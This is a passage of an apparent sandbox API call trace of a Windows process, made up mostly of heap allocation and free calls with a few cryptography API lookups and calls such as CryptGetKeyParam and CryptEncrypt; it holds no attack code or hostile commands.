hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.725] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0077.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0077.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0077.725] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0077.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0077.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0077.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0077.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.729] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0077.730] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2670, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2670*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.730] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0077.731] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.731] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.732] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.732] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0077.732] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0077.733] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.733] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.733] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.734] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, 